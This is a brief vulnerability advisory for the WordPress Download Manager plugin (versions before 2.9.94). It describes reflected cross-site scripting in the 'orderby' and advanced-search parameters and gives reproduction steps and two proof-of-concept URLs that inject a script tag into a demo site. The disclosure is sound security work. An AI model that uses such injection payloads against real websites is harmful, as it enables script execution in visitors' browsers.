In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publish_date . By adding parameter “> and add any XSS payload , the xss payload will execute. To reproduce, 1. Go to the link where we can find ?orderby 2. Add parameters >” and give simple payload like 3. The payload will execute. Another reflected cross-site scripting via advance search .
https://demo.wpdownloadmanager.com/wpdmpro/list-packages/?orderby=title"><script>alert(1)</script>&order;=asc https://demo.wpdownloadmanager.com/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17"><script>alert(1)</script>&search;[update_date]=&search;[view_count]=&search;[download_count]=&search;[package_size]=&search;[order_by]=&search;[order]=ASC&q;=a
CPE | Name | Operator | Version |
---|---|---|---|
download-manager | lt | 2.9.94 |